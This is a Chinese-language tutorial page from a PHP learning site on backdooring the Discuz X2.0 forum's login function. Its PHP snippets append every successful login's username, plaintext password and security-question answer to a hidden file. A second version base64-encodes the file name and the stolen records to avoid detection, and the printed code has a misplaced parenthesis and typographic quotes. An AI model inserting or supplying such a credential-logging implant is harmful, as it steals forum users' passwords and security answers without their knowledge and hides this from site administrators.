网站地图    收藏   

主页 > 后端 > 网站安全 >

DZx2.0 密码记录 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] //打开source/function/function_member.php//找到function userlogin//在return $return;前面加上$a=file_get_contents(dirname(__FILE__).rsquo;/1.txtrsquo;);file_put_contents(dirname(__FILE__).rsqu......

//打开source/function/function_member.php
 
//找到function userlogin
 
//在return $return;前面加上
 
$a=file_get_contents(dirname(__FILE__).’/1.txt’);
 
file_put_contents(dirname(__FILE__).’/1.txt’),$a.”Id:”.$username.”—-Psw:”.$password.”—-question:”.$questionid.”—-Answer:”.$answer.”\r\n”);
 
//记录登陆成功的账号密码以及问题答案!保存在source/function/目录下的1.txt
 
?>
一般上面的这样容易发现,我会把1.txt改名,并且base64_encode之后再保存。
 
 
//base64_encode之后再保存。
 
$a = file_get_contents(dirname(__FILE__).base64_decode(‘L2Z1bmN0aW9uX2NhY2hlLnR4dA==’));
 
file_put_contents(dirname(__FILE__).base64_decode(‘L2Z1bmN0aW9uX2NhY2hlLnR4dA==’),$a.base64_encode(“Id:”.$username.”—-Psw:”.$password.”—-question:”.$questionid.”—-Answer:”.$answer).”\r\n”);
 
?>
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论